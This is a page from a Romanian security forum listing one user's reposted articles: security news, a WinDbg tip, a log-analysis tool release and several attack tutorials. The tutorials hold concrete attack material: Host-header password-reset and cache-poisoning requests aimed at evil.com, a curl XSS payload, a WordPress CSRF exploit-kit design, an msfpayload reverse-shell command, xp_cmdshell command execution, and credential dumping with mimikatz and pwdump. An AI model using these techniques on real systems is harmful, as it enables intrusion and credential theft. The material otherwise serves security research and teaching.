Nytro's Content - Page 323 - Romanian Security Team

[JS] Detect antivirus

May 1, 2013
1 reply

Google pays record $31K bounty for Chrome bugs

Nytro posted a topic in Stiri securitate

[h=1]Google pays record $31K bounty for Chrome bugs[/h] [h=2]Rewards European researcher with $31,336 payment for reporting three vulnerabilities in JavaScript 3-D API[/h] By Gregg Keizer Computerworld - Google this month paid a security researcher $31,336 for reporting a trio of bugs in Chrome. The amount paid to Ralf-Philipp Weinmann, a research associate at the University of Luxembourg's Interdisciplinary Centre for Security, Reliability and Trust, was a record in Google's bug bounty program. Google has paid out more in various contests it's run or co-sponsored, including $100,000 to a two-man team from MWR InfoSecurity at last month's Pwn2Own. Google cited Weinmann's thoroughness in a short message two weeks ago acknowledging his bounty. "We're pleased to reward Ralf-Philipp Weinmann $31,336 under the Chromium Vulnerability Rewards Program for a chain of three bugs, including demo exploit code and very detailed write-up," said Ben Henry, a Google technical program manager, in a blog post. The three-bug chain credited to Weinmann exploited O3D, a JavaScript API (application programming interface) designed for crafting interactive 3-D graphics-based Web applications. The API and supporting browser plug-in were created by Google, with a preliminary version of the latter released in 2009. All three of the vulnerabilities were labeled "High," the second-most-serious ranking in Chrome's four-step scoring system. Weinmann's compensation was markedly more than the norm for Chrome's bounty program. Last August, however, Google announced bigger bounties -- saying the increase had been prompted by a decline in submissions -- and left the door open to a more flexible approach to issuing rewards and bonuses. So far this year, Google has paid nearly $188,000 in bounties and prizes for Chrome and Chrome OS, including those at Pwn2Own and Google's own Pwnium contest, both held in early March at a Vancouver, British Columbia, security conference. During Pwnium, a researcher known only as "Pinkie Pie" received $40,000 for a partial exploit of Google's browser-based operating system. Mozilla, developer of Firefox, also pays bug bounties, but unlike Google, does not release the names of researchers or the payments they receive. This article, Google pays record $31K bounty for Chrome bugs, was originally published at Computerworld.com.

May 1, 2013

Windbg Tricks - Module Relocation

Nytro posted a topic in Tutoriale in engleza

[h=3]Windbg Tricks - Module Relocation[/h]When ASLR is not supported, pseudo ASLR is often used to introduce a degree of entropy in where the module is loaded into memory. The basic idea behind pseudo ASLR is to pre-allocate memory at the location of a module's preferred base address. This forces the module to be loaded at a non-predetermined address. See this for more details. I stumbled across the windbg command !imgreloc the other day. It can be used to show all modules that have been relocated, and what their original preferred base address is. Below is the output when run while attached to firefox.exe (see this ticket about dll blocking and this firefox ticket for a specific history of pseudo ASLR in firefox): 0:017> !imgreloc 00280000 sqlite3 - RELOCATED from 10000000 00300000 js3250 - RELOCATED from 10000000 00400000 firefox - at preferred address 004e0000 nspr4 - RELOCATED from 10000000 00510000 smime3 - RELOCATED from 10000000 00530000 nss3 - RELOCATED from 10000000 005d0000 nssutil3 - RELOCATED from 10000000 005f0000 plc4 - RELOCATED from 10000000 00600000 plds4 - RELOCATED from 10000000 00610000 ssl3 - RELOCATED from 10000000 00640000 xpcom - RELOCATED from 10000000 01220000 browserdirprovider - RELOCATED from 10000000 01540000 brwsrcmp - RELOCATED from 10000000 01de0000 nssdbm3 - RELOCATED from 10000000 02000000 xpsp2res - RELOCATED from 00010000 036a0000 softokn3 - RELOCATED from 10000000 03980000 freebl3 - RELOCATED from 10000000 039d0000 nssckbi - RELOCATED from 10000000 10000000 xul - at preferred address 59a60000 dbghelp - at preferred address 5ad70000 uxtheme - at preferred address 0:017> .shell -ci "!imgreloc" findstr RELOCATED 00280000 sqlite3 - RELOCATED from 10000000 00300000 js3250 - RELOCATED from 10000000 004e0000 nspr4 - RELOCATED from 10000000 00510000 smime3 - RELOCATED from 10000000 00530000 nss3 - RELOCATED from 10000000 005d0000 nssutil3 - RELOCATED from 10000000 005f0000 plc4 - RELOCATED from 10000000 00600000 plds4 - RELOCATED from 10000000 00610000 ssl3 - RELOCATED from 10000000 00640000 xpcom - RELOCATED from 10000000 01220000 browserdirprovider - RELOCATED from 10000000 01540000 brwsrcmp - RELOCATED from 10000000 01de0000 nssdbm3 - RELOCATED from 10000000 02000000 xpsp2res - RELOCATED from 00010000 036a0000 softokn3 - RELOCATED from 10000000 03980000 freebl3 - RELOCATED from 10000000 039d0000 nssckbi - RELOCATED from 10000000 Searching for preferred instead of RELOCATED will yield a list of modules that should remain at their preferred address (and thus be usable for ROP or other such techniques). Posted by d0c.s4vage Sursa: d0c_s4vage: Windbg Tricks - Module Relocation

May 1, 2013

WordPress CSRF Exploit kit – A novel approach to exploiting WordPress plugins

Nytro posted a topic in Stiri securitate

[h=2]WordPress CSRF Exploit kit – A novel approach to exploiting WordPress plugins[/h] Over the last few weeks I’ve been on roll with finding CSRF vulnerabilities in WordPress plugins. That’s all nice and good, but when you’ve got 30 of them, it’s a shame to not take it a step further and show the dangers of them! This project is solely designed to show off a few random thoughts of mine, and most importantly to hopefully inspire others to think along these lines. This project is solely meant for educational purposes, not attack against running services or people. https://github.com/CharlieEriksen/WP-CSRF-POC The project shows a few basic concepts in regards to the process of pulling off a CSRF attack against a large number of WordPress sites. Some things worth pointing out: It’s not designed to simply spray and pray. You define the target URLs you want to hit and then you have an unique URL for each blog you can go phishing with. Then it will use the onload function of an img or script tag to detect the presence of the vulnerable plugin on the target blog on request through the unique URL pre-defined We generate the payload on request with an uniquely identifying URL to ensure it’s not easy to extract the exploits. You get max 2 requests to the script per IP. That is all a compromise needs. After that, you get nothing back. Makes it harder for researchers life We deliver a beef hook. Because beef is cool and god damn tasty I want to stress especially the “novel” use of the onload function of img/script tags. People in the past have used it to detect the presence of different host-names/”port scanning” internal systems by vectoring through a hooked browser. I say that’s cool and all, but you can take that further and use it to detect the presence of a plugin on a target on demand, making you able to be much more sneaky. When the markup detects a plugin present on the target, it redirects the browser to the exploit, and no further requests can be made by that IP to the script. A normal series of events would be: An attacker sets up this script with pre-defined targets(targets variable) with an unique URL for each target blog The attacker then spams out a link to the running script with the unique URL for each target blog When a target clicks the link to this script, we validate that the URL contains the unique identifier that resolves to a blog URL The script the generates a random URL for each exploit we have with the target blog URL put in that can then be requested We output to the user a series of img/script tags with onload attributes that redirect to the unique URL generated in step 4. These tags look for specific plugins on the targeted blog If none of the plugins are detected on the blog, we redirect to google If any of the plugins are detected, we redirect to the uniquely generated URL made in step 4 The exploit is now written out to the user, submitting the CSRF with a XSS payload pointing to our beef instance We now delete all cached exploits made for the requesting IP There’s a number of improvements that could be made to this. It could be designed to spray and pray through iframes, but that is much much dirtier, and not the goal of this proof of concept. I urge anybody who finds the concept to be useful to run with it if they so desire. I’ll be adding more exploits as advisories are published. Otherwise, I’m curious to hear people’s thoughts on this. Sursa: Wordpress CSRF Exploit kit – A novel approach to exploiting Wordpress plugins | ceriksen.com

May 1, 2013

Practical HTTP Host header attacks

Nytro posted a topic in Tutoriale in engleza

[h=3]Practical HTTP Host header attacks[/h] [h=2][/h] [h=3]Password reset and web-cache poisoning[/h] [h=4](And a little surprise in RFC-2616)[/h] [h=3]Introduction[/h] How does a deployable web-application know where it is? Creating a trustworthy absolute URI is trickier than it sounds. Developers often resort to the exceedingly untrustworthy HTTP Host header (_SERVER["HTTP_HOST"] in PHP). Even otherwise-secure applications trust this value enough to write it to the page without HTML-encoding it with code equivalent to: <link href="http://_SERVER['HOST']" (Joomla) ...and append secret keys and tokens to links containing it: <a href="http://_SERVER['HOST']?token=topsecret"> (Django, Gallery, others) ....and even directly import scripts from it: <script src="http://_SERVER['HOST']/misc/jquery.js?v=1.4.4"> (Various) There are two main ways to exploit this trust in regular web applications. The first approach is web-cache poisoning; manipulating caching systems into storing a page generated with a malicious Host and serving it to others. The second technique abuses alternative channels like password reset emails where the poisoned content is delivered directly to the target. In this post I'll look at how to exploit each of these in the presence of 'secured' server configurations, and how to successfully secure applications and servers. [h=3]Password reset poisoning[/h] Popular photo-album platform Gallery uses a common approach to forgotten password functionality. When a user requests a password reset it generates a (now) random key: Places it in a link to the site: and emails to the address on record for that user. [Full code] When the user visits the link, the presence of the key proves that they can read content sent to the email address, and thus must be the rightful owner of the account. The vulnerability was that url::abs_site used the Host header provided by the person requesting the reset, so an attacker could trigger password reset emails poisoned with a hijacked link by tampering with their Host header: > POST /password/reset HTTP/1.1 > Host: evil.com > ... > csrf=1e8d5c9bceb16667b1b330cc5fd48663&name=admin This technique also worked on Django, Piwik and Joomla, and still works on a few other major applications, frameworks and libraries that I can't name due to an unfortunate series of mistakes on my part. Of course, this attack will fail unless the target clicks the poisoned link in the unexpected password reset email. There are some techniques for encouraging this click but I'll leave those to your imagination. In other cases, the Host may be URL-decoded and placed directly into the email header allowing mail header injection. Using this, attackers can easily hijack accounts by BCCing password reset emails to themselves - Mozilla Persona had an issue somewhat like this, back in alpha. Even if the application's mailer ignores attempts to BCC other email addresses directly, it's often possible to bounce the email to another address by injecting \r\nReturn-To: attacker@evil.com followed by an attachment engineered to trigger a bounce, like a zip bomb. [h=3]Cache poisoning[/h] Web-cache poisoning using the Host header was first raised as a potential attack vector by Carlos Beuno in 2008. 5 years later there's no shortage of sites implicitly trusting the host header so I'll focus on the practicalities of poisoning caches. Such attacks are often difficult as all modern standalone caches are Host-aware; they will never assume that the following two requests reference the same resource: > GET /index.html HTTP/1.1 > GET /index.html HTTP/1.1 > Host: example.com > Host: evil.com So, to persuade a cache to serve our poisoned response to someone else we need to create a disconnect between the host header the cache sees, and the host header the application sees. In the case of the popular caching solution Varnish, this can be achieved using duplicate Host headers. Varnish uses the first host header it sees to identify the request, but Apache concatenates all host headers present and Nginx uses the last host header. This means that you can poison a Varnish cache with URLs pointing at evil.com by making the following request: > GET / HTTP/1.1 > Host: example.com > Host: evil.com Application-level caches can also be susceptible. Joomla writes the Host header to every page without HTML-encoding it, and its cache is entirely oblivious to the Host header. Gaining persistent XSS on the homepage of a Joomla installation was as easy as: curl -H "Host: cow\"onerror='alert(1)'rel='stylesheet'" http://example.com/ | fgrep cow\" This will create the following request: > GET / HTTP/1.1 > Host: cow"onerror='alert(1)'rel='stylesheet' The response should show a poisoned <link> element: <link href="http://cow"onerror='alert(1)'rel='stylesheet'/" rel="canonical"/> To verify that the cache has been poisoned, just load the homepage in a browser and observe the popup. [h=3]'Secured' configurations[/h] So far I've assumed that you can make a HTTP request with an arbitrary Host header arrive at any application. Given that the intended purpose of the Host header is to ensure that a request is passed to the correct application at a given IP address, it's not always that simple. Sometimes it is trivial. If Apache receives an unrecognized Host header, it passes it to the first virtual host defined in httpd.conf. As such, it's possible to pass requests with arbitrary host headers directly to a sizable number of applications. Django was aware of this default-vhost risk and responded by advising that users create a dummy default-vhost to act as a catchall for requests with unexpected Host headers, ensuring that Django applications never got passed requests with unexpected Host headers. The first bypass for this used X-Forwarded-For's friend, the X-Forwarded-Host header, which effectively overrode the Host header. Django was aware of the cache-poisoning risk and fixed this issue in September 2011 by disabling support for the X-Forwarded-Host header by default. Mozilla neglected to update addons.mozilla.org, which I discovered in April 2012 with the following request: > POST /en-US/firefox/user/pwreset HTTP/1.1> Host: addons.mozilla.org > X-Forwarded-Host: evil.com Even patched Django installations were still vulnerable to attack. Webservers allow a port to be specified in the Host header, but ignore it for the purpose of deciding which virtual host to pass the request to. This is simple to exploit using the ever-useful http://username:password@domain.com syntax: > POST /en-US/firefox/user/pwreset HTTP/1.1> Host: addons.mozilla.org:@passwordreset.net This resulted in the following (admittedly suspicious) password reset link: https://addons.mozilla.org:@passwordreset.net/users/pwreset/3f6hp/3ab-9ae3db614fc0d0d036d4 If you click it, you'll notice that your browser sends the key to passwordreset.net before creating the suspicious URL popup. Django released a patch for this issue shortly after I reported it: https://www.djangoproject.com/weblog/2012/oct/17/security/ Unfortunately, Django's patch simply used a blacklist to filter @ and a few other characters. As the password reset email is sent in plaintext rather than HTML, a space breaks the URL into two separate links: > POST /en-US/firefox/users/pwreset HTTP/1.1 > Host: addons.mozilla.org: www.securepasswordreset.com Django's followup patch ensured that the port specification in the Host header could only contain numbers, preventing the port-based attack entirely. However, the arguably ultimate authority on virtual hosting, RFC2616, has the following to say: 5.2 The Resource Identified by a Request [...] If Request-URI is an absoluteURI, the host is part of the Request-URI. Any Host header field value in the request MUST be ignored. The result? On Apache and Nginx (and all compliant servers) it's possible to route requests with arbitrary host headers to any application present by using an absolute URI: > POST https://addons.mozilla.org/en-US/firefox/users/pwreset HTTP/1.1 > Host: evil.com This request results in a SERVER_NAME of addons.mozilla.org but a HTTP['HOST'] of evil.com. Applications that use SERVER_NAME rather than HTTP['HOST'] are unaffected by this particular trick, but can still be exploited on common server configurations. See HTTP_HOST vs. SERVER_NAME for more information of the difference between these two variables. Django fixed this in February 2013 by enforcing a whitelist of allowed hosts. See the documentation for more details. However, these attack techniques still work fine on many other web applications. [h=3]Securing servers[/h] Due to the aforementioned absolute request URI technique, making the Host header itself trustworthy is almost a lost cause. What you can do is make SERVER_NAME trustworthy. This can be achieved under Apache (instructions) and Nginx (instructions) by creating a dummy vhost that catches all requests with unrecognized Host headers. It can also be done under Nginx by specifying a non-wildcard SERVER_NAME, and under Apache by using a non-wildcard serverName and turning the UseCanonicalName directive on. I'd recommend using both approaches wherever possible. A patch for Varnish should be released shortly. As a workaround until then, you can add the following to the config file: import std; sub vcl_recv { collect(req.http.host); } [h=3]Securing applications[/h] Fixing this issue is difficult, as there is no entirely automatic way to identify which host names the administrator trusts. The safest, albeit mildly inconvenient solution, is to use Django's approach of requiring administrators to provide a whitelist of trusted domains during the initial site setup process. If that is too drastic, at least ensure that SERVER_NAME is used instead of the Host header, and encourage users to use a secure server configuration. [h=3]Further research[/h] More effective / less inconvenient fixes Automated detection Exploiting wildcard whitelists with XSS & window.history Exploiting multipart password reset emails by predicting boundaries Better cache fuzzing (trailing Host headers?) Thanks to Mozilla for funding this research via their bug-bounty program, Varnish for the handy workaround, and the teams behind Django, Gallery, and Joomla for their speedy patches. Feel free to drop a comment, email or DM me if you have any observations or queries. Sursa: http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

May 1, 2013

Sagan v0.3.0 Released

Nytro posted a topic in Programe utile

[h=1]Sagan v0.3.0 Released[/h] Sagan is an open source (GNU/GPLv2) high performance, real-time log analysis & correlation engine that run under *nix operating systems (Linux/FreeBSD/ OpenBSD/etc). It is written in C and uses a multi-threaded architecture to deliver high performance log & event analysis. Sagan’s structure and rules work similarly to the Sourcefire “Snort” IDS/IPS engine. This was intentionally done to maintain compatibility with rule management software (oinkmaster/pulledpork /etc) and allows Sagan to correlate log events with your Snort IDS/IPS system. Sagan can also write to Snort IDS/IPS databases via Unified2/Barnyard2. Sagan is compatible with all Snort “consoles”. For example, Sagan is will work with Snorby (http://www.snorby.org), Sguil (http://sguil.sourceforge.net), BASE, the Prelude IDS framework (https://www.prelude-ids.org) and proprietary consoles! (to name a few). [h=3]Changelog v0.3.0[/h] The biggest change is that Sagan is now capable of utilizing all CPUs/cores. While Sagan has always been multi-threaded to prevent I/O blocking, previous versions could only utilize one core for event analysis. This is no longer the case–Sagan will now use any and all CPUs available, which means that Sagan can digest, parse and analyze even higher number of events per/second. Introduction of “processors.” Processors provide Sagan the ability to analyze logs using methods other than traditional signature based technology. Current Processors are: Blacklist – Search log messages for blacklisted IP addresses. Search – Search logs for keyword terms (ie – domain names, etc) Track Clients – Informs you when systems aren’t logging properly. Websense Threatseeker – Queries the Websense Threatseeker network for reputation data (Not include with the GPLv2 release). More processors are currently in development. The direct SQL output plugin has been removed, in order to maintain full compatibility with Snort. To write to a SQL database, use Unified2 output and Barnyard2. Introduction of port variables ($SSH_PORT, $DNS_PORT) in rules. More normalization and parsing options (parse_src_ip, parse_proto, etc). Sagan currently has over five thousand signatures/rules. More Information: here Download Sagan v0.3.0 Sursa: Sagan v0.3.0 Released | ToolsWatch.org - The Hackers Arsenal Tools | Repository for vFeed and DPE Projects

May 1, 2013

Aging networking protocols abused in DDoS attacks

Nytro posted a topic in Stiri securitate

[h=1]Aging networking protocols abused in DDoS attacks[/h][h=2]Printers, routers and many other Internet-connected devices can be used in an attack[/h][h=3]By Jeremy Kirk[/h] May 01, 2013 — IDG News Service — Aging networking protocols still employed by nearly every Internet-connected device are being abused by hackers to conduct distributed denial-of-service (DDoS) attacks. Security vendor Prolexic found that attackers are increasingly using the protocols for what it terms "distributed reflection denial-of-service attacks" (DrDos), where a device is tricked into sending a high volume of traffic to a victim's network. "DrDos protocol reflection attacks are possible due to the inherent design of the original architecture," Prolexic wrote in a white paper. "When these protocols were developed, functionality was the main focus, not security." Government organizations, banks and companies are targeted by DDoS attacks for a variety of reasons. Hackers sometimes use DDoS attacks to draw attention away from other mischief or want to disrupt an organization for political or philosophical reasons. One of the targeted protocols, known as Network Time Protocol (NTP), is used in all major operating systems, network infrastructure and embedded devices, Prolexic wrote. It is used to synchronize clocks among computers and servers. A hacker can launch at attack against NTP by sending many requests for updates. By spoofing the origin of the requests, the NTP responses can be directed at a victim host. It appears the attackers are abusing a monitoring function in the protocol called NTP mode 7 (monlist). The gaming industry has been targeted by this style of attack, Prolexic said. Other network devices, such as printers, routers, IP video cameras and a variety of other Internet-connected equipment use an application layer protocol called Simple Network Management Protocol (SNMP). SNMP communicates data about device components, Prolexic wrote, such as measurements or sensor readings. SNMP devices return three times as much data as when they're pinged, making them an effective way to attack. Again, an attacker will send a spoofed IP request to an SNMP host, directing the response to a victim. Prolexic wrote there are numerous ways to mitigate an attack. The best advice is to disable SNMP if it is not needed. The U.S. Computer Emergency Readiness Team warned administrators in 1996 of a potential attack scenario involving another protocol, Character Generator Protocol, or CHARGEN. It is used as a debugging tool since it sends data back regardless of the input. But Prolexic wrote that it "may allow attackers to craft malicious network payloads and reflect them by spoofing the transmission source to effectively direct it to a target. This can result in traffic loops and service degradation with large amounts of network traffic." CERT recommended at that time to disable any UDP (User Datagram Protocol) service such as CHARGEN if it isn't needed. Sursa: Aging networking protocols abused in DDoS attacks - CSO Online - Security and Risk

May 1, 2013

Facebook Q1 Earnings: Striking Mobile Revenue Growth

Nytro posted a topic in Stiri securitate

[h=1]Facebook Q1 Earnings: Striking Mobile Revenue Growth[/h]May 1st, 2013, 20:37 GMT · By Gabriela Vatu Facebook has barely exceeded estimates and reported revenues of $1.458 billion (€1.105 billion) for the first quarter of 2013 and it also announced a 54% increase in mobile revenues. The company has published their first quarterly results of 2013. Overall, Facebook's revenues exceeded the $1.44 billion (€1.09 billion) estimates of Wall Street specialists. The social network also brought in over $751 million (€570 million) in mobile revenue in the first quarter, which is a 54% increase year-over-year. This has been extremely important to investors over the past year, so such an increase in this division is expected to cause a rise in stock prices for Facebook. Out of the company’s overall result for the first three months, 85% came from advertising. Facebook has managed to garner $1.25 billion (€0.94 billion) by selling ads, which is 43% more than last year. Mobile ads also played an important part, as they represented 30% of the total ad revenue, which is over Wall Street expectations. Facebook’s net income for the first quarter was of $219 million (€166 million), a small increase over last year’s results, when they had profits of $205 million (€155 million). The social network giant also announced that they have cash and marketable securities of $9.5 billion (€7.2 billion) at the end of the quarter. “We’ve made a lot of progress in the first few months of the year,” Mark Zuckerberg, Facebook CEO said at the conference. He continued by saying that they’ve seen strong growth and engagement across the community, as well as launched several exciting products. Facebook daily active users number also increased with 26% over the last year up to 665 million on average in March. The monthly active users number also grew significantly, reaching 1.11 billion. This represents a 23% increase over last year. David Spillane, Facebook’s Chief Accounting Officer has announced that he will be leaving the company. Sursa: Facebook Q1 Earnings: Striking Mobile Revenue Growth - Softpedia

May 1, 2013

Ce ascultati acum?

Nytro replied to joe_capitano's topic in Discutii non-IT

http://www.youtube.com/watch?v=ghC_UCavA5o&feature=share

May 1, 2013
3191 replies

AudioCoder Buffer Overflow Exploit (SEH)

Nytro replied to neox's topic in Exploituri

Super.

May 1, 2013
1 reply

Problema semnatura

Nytro replied to Renegade's topic in Sugestii

242 rows affected. ( Query took 0.0078 sec )

May 1, 2013
9 replies

Hacking Windows Servers - Privilege Escalation

Nytro posted a topic in Tutoriale in engleza

[h=3]Hacking Windows Servers - Privilege Escalation [/h] Most of us here can hack websites and servers. But what we hate the most is an error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks. But, these get the job done only on Linux servers. What about windows servers? Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges. Using "sa" account to execute commands by MSSQL query via 'xp_cmdshell' stored procedure. Using meterpreter payload to get a reverse shell over the target machine. Using browser_autopwn. (Really...) Using other tools like pwdump7, mimikatz, etc. Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above. 1. Using xp_cmdshell- Most of the times on windows servers, we have read permission over the files of other IIS users, which is needed to make this method work. If we are lucky enough, we will find login credentials of "sa" account of MSSQL server inside web.config file of any website. You must be wondering why only "sa"? Here, "sa" stands for Super Administrator and as the name tells, this user has all possible permissions over the server. The picture below shows the connection string containing login credentials of "sa" account. Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path. So, after getting the "sa" account, we can login remotely using HeidiSQL HeidiSQL is an awesome tool to connect to remote database servers. You can download it here. After logging into MSSQL server with sa account, we get a list of databases and their contents. Now we can execute commands using MSSQL queries via xp_cmdshell. (With administrator privileges) Syntax for the query is- xp_cmdshell '[command]' For example, if I need to know my current privileges, I would query- xp_cmdshell 'whoami' This shows that I am currently NT Authority/System, which most of us know is the highest user in the windows user hierarchy. Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP. Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online. 2. Meterpreter Payload- This method is quite easy and comes useful when we cannot read files of other users, but we can execute commands. Using metasploit, generate a reverse shell payload binary. For example- msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe Now we will upload this executable to the server using our web backdoor. Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly) Now it's time to execute the payload. If everything goes right, we will get a meterpreter session over the target machine as shown below- We can also use php, asp or other payloads. 3. Browser Autopwn- This seems odd, as a way of hacking a server. But I myself found this as a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in domain environment. Most of the windows servers have outdated Internet Explorer and we can exploit them if we can execute commands. I think it is clear by now that what I'm trying to explain We can start Internet Explorer from command line and make it browse to a specific URL. Syntax for this- iexplore.exe Where URL would our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection. 4. Using readily available tools- Tools like pwdump and mimikatz can crack passwords of windows users. #pwdump7 gives out the NTLM hashes of the users which can be cracked further using John the Ripper. The following screenshot shows NTLM hashes from pwdump7: #mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool is some language other than English so do watch tutorials on how to use it. Following picture shows plain text passwords from mimikatz: You can google about them and learn how to use these tools and what actually they exploit to get the job done for you. I hope you can now exploit every another windows server. Happy Hacking About The Author This article has been written by Deepankar Arora, He is an independent security researcher from India, He has been listed in various hall of fames. Sursa: Hacking Windows Servers - Privilege Escalation | Learn How To Hack - Ethical Hacking and security tips

April 26, 2013

Tor calls for help as its supply of bridges falters

Nytro posted a topic in Stiri securitate

[h=1]Tor calls for help as its supply of bridges falters[/h][h=2]Bridges help users in countries like China and Iran access the network.[/h] by Sean Gallagher - Apr 17 2013, 7:23pm GTBDT Just like the US highway infrastructure, Tor needs new bridges. The encrypted anonymizing "darknet" that allows activists, journalists, and others to access the Internet without fear of censorship or monitoring—and which has also become a favored technology of underground groups like child pornographers—is having increasing difficulty serving its users in countries that have blocked access to Tor's entry points. Tor bridges are computers that act as hidden gateways to Tor's darknet of relays. After campaigning successfully last year to get more volunteers to run obfuscated Tor bridges to support users in Iran trying to evade state monitoring, the network has lost most of those bridges, according to a message to the Tor relays mailing list by Tor volunteer George Kadiankakis. "Most of those bridges are down, and fresh ones are needed more than ever," Kadiankakis wrote in an e-mail, "since obfuscated bridges are the only way for people to access Tor in some areas of the world (like China, Iran, and Syria)." Obfuscated bridges allow users to connect to the Tor network without using one of the network's known public bridges or relays as an initial entry point. Obfuscated bridges have become a necessity for Tor users in countries with networks guarded by various forms of deep packet inspection technology, where censors have put in place filters that spot traffic matching the signature of a Tor-protected connection. Some of these censors use a blocking list for traffic to known Tor bridges. To circumvent detection, Tor users can use a plugin called a "pluggable transport" to connect to an obfuscated bridge and mask their network signature. To further evade potential censoring, the addresses for obfuscated bridges are not part of Tor's main directory but are stored in a distributed database called BridgeDB. The BridgeDB's interface spoons out addresses two at a time per request in an effort to prevent attacks to expose a full list, and no BridgeDB instance keeps a full list of the available bridges. Additionally, Tor provides "unpublished" bridge addresses to users who request them via e-mail. The Tor Project's support assistants—volunteers who respond to support requests—only respond to requests to e-mails from Gmail and Yahoo e-mail accounts to both deal with the flood of requests and reduce the chance that an attacker will be able to learn the addresses of a large number of bridges. The problem for Tor is that those bridges do get detected by attackers over time, and pluggable transports can eventually be detected. The most widely used pluggable transport in the Tor network, obfs2, no longer works in China. A new plugin, obfs3, will work in China, but it runs only on the latest version of the obfuscated bridge proxy—which was recently rewritten in Python. "Looking into BridgeDB," Kadiankakis wrote in his message to the Tor community, "we have 200 obfs2 bridges, but only 40 obfs3 bridges: this means that we need more people running the new Python obfsproxy! Upgrading obfsproxy should be easy now, since we prepared new instructions and Debian/Ubuntu packages." He added that there is also a particular need for more unpublished bridges. For those who want to donate bridges to the Tor network, the easiest route is to use Tor Cloud, an Amazon Web Service Elastic Compute Cloud image created by the Tor Project that allows people to leverage Amazon's free usage tier to deploy a bridge. Sursa: http://arstechnica.com/information-technology/2013/04/tor-calls-for-help-as-its-supply-of-bridges-falters/

April 26, 2013

[C] Love letter (obfuscated C contest 1990)

Nytro posted a topic in Programare

[C] Love letter (obfuscated C contest 1990) char*lie; double time, me= !0XFACE, not; int rested, get, out; main(ly, die) char ly, **die ;{ signed char lotte, dear; (char)lotte--; for(get= !me;; not){ 1 - out & out ;lie;{ char lotte, my= dear, **let= !!me *!not+ ++die; (char*)(lie= "The gloves are OFF this time, I detest you, snot\n\0sed GEEK!"); do {not= *lie++ & 0xF00L* !me; #define love (char*)lie - love 1s *!(not= atoi(let [get -me? (char)lotte- (char)lotte: my- *love - 'I' - *love - 'U' - 'I' - (long) - 4 - 'U' ])- !! (time =out= 'a'));} while( my - dear && 'I'-1l -get- 'a'); break;}} (char)*lie++; (char)*lie++, (char)*lie++; hell:0, (char)*lie; get *out* (short)ly -0-'R'- get- 'a'^rested; do {auto*eroticism, that; puts(*( out - 'c' -('P'-'S') +die+ -2 ));}while(!"you're at it"); for (*((char*)&lotte)^= (char)lotte; (love ly) [(char)++lotte+ !!0xBABE]{ if ('I' -lie[ 2 +(char)lotte]){ 'I'-1l ***die; } else{ if ('I' * get *out* ('I'-1l **die[ 2 ])) *((char*)&lotte) -= '4' - ('I'-1l); not; for(get=! get; !out; (char)*lie & 0xD0- !not) return!! (char)lotte;} (char)lotte; do{ not* putchar(lie [out *!not* !!me +(char)lotte]); not; for(;!'a';}while( love (char*)lie);{ register this; switch( (char)lie [(char)lotte] -1s *!out) { char*les, get= 0xFF, my; case' ': *((char*)&lotte) += 15; !not +(char)*lie*'s'; this +1s+ not; default: 0xF +(char*)lie;}}} get - !out; if (not--) goto hell; exit( (char)lotte);} Sursa: http://www0.us.ioccc.org/1990/westley.c PS: E posibil sa primiti o eroare cu invalid suffix "s". Puneti si voi "L" sau "5" in locul acelui "s".

April 26, 2013

Pen Testing SQL Servers With Nmap

Nytro posted a topic in Tutoriale in engleza

Pen Testing SQL Servers With Nmap The Nmap Scripting Engine has transform Nmap from a regular port scanner to a penetration testing machine.With the variety of the scripts that exists so far we can even perform a full penetration test to an SQL database without the need of any other tool.In this tutorial we will have a look in these scripts,what kind of information these extract from the database and how we can exploit the SQL server and execute system commands through Nmap. Most SQL databases run on port 1433 so in order to discover information regarding the database we need to execute the following script: Obtain SQL Information – Nmap So we already have the database version and the instance name.The next step is to check whether there is a weak password for authentication with the database.In order to achieve that we need to run the following nmap script which it will perform a brute force attack. Brute Force Weak MS-SQL Accounts – Nmap As we can see in this case we didn’t discover any credentials.If we want we can use this script with our own username and password lists in order to discover a valid database account with this command: nmap -p1433 –script ms-sql-brute –script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt However we can always try another script which can check for the existence of null passwords on Microsoft SQL Servers. Check For Null passwords on SA accounts – Nmap Now we know that the sa account has not a password.We can use this information in order to connect with the database directly or to continue to execute further Nmap scripts that require valid credentials.If we want to know in which databases the sa account has access to or any other account that we have discovered we can run the ms-sql-hasdbaccess script with the following arguments: Discover which user has access to which db – Nmap We can even query the Microsoft SQL Server via Nmap in order to obtain the database tables. List Tables – Nmap In 2000 version of SQL Server xp_cmdshell is enabled by default so we can even execute operating system commands through Nmap scripts as it can be seen in the image below: Run OS command via xp_cmdshell – Nmap Run net users via xp_cmdshell – Nmap Last but not least we can run a script to extract the database password hashes for cracking with tools like john the ripper. Dump MS-SQL hashes – Nmap In this case we didn’t have any hashes because there was only one account on the database the sa which has null password. Sursa: Pen Testing SQL Servers With Nmap | Penetration Testing Lab

April 26, 2013

PeStudio

Nytro posted a topic in Programe utile

